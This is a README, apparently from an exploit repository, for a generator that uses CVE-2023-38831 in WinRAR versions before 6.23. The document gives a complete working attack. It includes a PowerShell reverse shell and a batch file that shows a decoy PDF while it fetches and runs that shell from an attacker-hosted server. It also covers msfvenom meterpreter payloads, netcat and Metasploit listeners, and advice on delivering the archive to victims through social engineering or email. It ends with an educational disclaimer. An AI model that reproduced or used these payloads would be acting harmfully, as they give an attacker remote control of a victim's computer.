Share
## https://sploitus.com/exploit?id=BB860A5A-E0B9-527E-ADC3-83479715E37C
# CVE-2023-38831 WinRAR Exploit Generator

### Created by: `technical_corp`

This project contains a Python script that exploits **CVE-2023-38831**, a vulnerability in **WinRAR** versions prior to 6.23. The exploit generates a **malicious RAR archive** that triggers the execution of arbitrary code when the victim opens a benign-looking file within the archive (such as a PDF). The vulnerability was actively exploited in the wild from April through August 2023.

## Vulnerability Overview

**CVE-2023-38831** is a vulnerability in **WinRAR** that allows attackers to execute arbitrary code when the victim opens an archive containing both a **benign file** and a **malicious folder** with the same name. When the user interacts with the benign file, WinRAR mistakenly processes the contents of the malicious folder and executes the attacker's payload.

## Exploit Features

- Generates a **malicious RAR archive** that contains a bait file (e.g., a PDF) and a payload (e.g., a `.bat` or `.exe` file).
- The bait file can be any user-specified file (such as a PDF or document).
- The payload can be any executable or script (such as a reverse shell created using **msfvenom**).
- When the victim opens the bait file, the payload is executed silently in the background.

## Prerequisites

- **Python 3.x**
- **WinRAR** version prior to **6.23** installed on the victim machine (this is the vulnerable version).
- Download ***[WinRAR 6.22](https://www.filehorse.com/download/file/T-3699kXYuUKG3GzRUEe1X0eLMxOIyV6M3aWyIdTxDKIm8DXsj0N8PmHauQ4tBkkbxx8iu5i0npPs5m3oEfVNcyWEAIk1TMUY86BuGFHs6E/)*** from here
- **Metasploit Framework** (optional, for generating payloads).

## How to Use

### Clone this repository:
   ```
   git clone [https://github.com/technical_corp/CVE-2023-38831-Exploit.git](https://github.com/technicalcorp2/CVE-2023-38831-exploit-generator)
   cd CVE-2023-38831-exploit-generator
```
We will use a batch file embedded in a .rar archive to download and execute a hosted PowerShell reverse shell.

### Steps:
***Create the PowerShell Reverse Shell Script:***

Save the following PowerShell script as reverse.ps1 on your Kali Linux machine:
```
$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<attacker_port>);
$stream = $client.GetStream();
[byte[]]$buffer = 0..65535|%{0};
while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()};
$client.Close()
```
Replace <attacker_ip> with your Kali Linux machine’s IP.

Replace <attacker_port> with the port number you'll listen on.

Host the PowerShell Script on Your Kali Linux Machine:

Navigate to the folder where the PowerShell script is saved:
```
cd /path/to/powershell-script
```
Use Python's HTTP server to host the file on port 80:
```
python3 -m http.server 80
```
This will make reverse.ps1 available at http://<attacker_ip>/reverse.ps1.

### Create a Batch File to Download and Run the PowerShell Script:

Create a batch file (script.bat) that will download and execute the PowerShell reverse shell:
```
@echo off
:: Open the legitimate PDF
start bait.pdf

:: Download and execute the PowerShell script
powershell -Command "Invoke-WebRequest -Uri 'http://<attacker_ip>/reverse.ps1' -OutFile 'C:\Users\Public\reverse.ps1'; Start-Process powershell -ArgumentList '-ExecutionPolicy Bypass -File C:\Users\Public\reverse.ps1' -NoNewWindow"
exit
```
***Use the CVE-2023-38831 Exploit Script to Embed the Batch File:***

Run the WinRAR exploit script to embed the batch file in a legitimate PDF:
```
python3 CVE-2023-38831-WinRar-Exploit.py -b legitimate.pdf -p script.bat -o POC.rar
```
This command creates the POC.rar file, which contains the script.bat that will execute the reverse shell.

### Set Up a Netcat Listener on Kali Linux:

Start a Netcat listener to catch the reverse shell:
```
nc -lvnp <attacker_port>
```
### Deliver the Exploit (POC.rar) to the Victim:

Once the victim opens the POC.rar and executes the PDF file, the script.bat will be triggered.
The script will download and execute the PowerShell reverse shell from your server.
You will receive a reverse shell connection on your Netcat listener.

### Using an Executable Without Immediate Execution:

Generate a payload (if using Metasploit): You can create a reverse shell payload using msfvenom:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe
```
Move the created payload.exe file in ***CVE-2023-WinRAR-exploit-generator directory***

Run the exploit generator: Run the Python script to generate a malicious RAR file:
```
python cve-2023-38831-exploiter.py -b nmapcheatsheet.pdf -p payload.exe -o POC.rar
```
-b: Specify the bait file (e.g., nmapcheatsheet.pdf).
-p: Specify the payload file (e.g., script.bat or payload.exe).
-o: Specify the output file name (e.g., POC.rar).

Deliver the RAR file to the victim: The generated malicious_archive.rar can be delivered to the victim via social engineering, email attachments, or file-sharing platforms.

Set up a listener (if using Metasploit): On your attacker machine, set up a listener to catch the reverse shell:

```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_IP>
set LPORT <attacker_port>
exploit
```
### Exploit Workflow
The attacker delivers a malicious RAR file to the victim.
The victim opens the bait file (e.g., nmapcheatsheet.pdf), which silently triggers the payload.
The payload (e.g., a reverse shell) is executed in the background, providing the attacker with control over the victim’s system.

### Disclaimer
This project is intended for educational purposes only. The author does not take responsibility for any misuse of this exploit. It should only be used in authorized environments or penetration testing scenarios with full consent.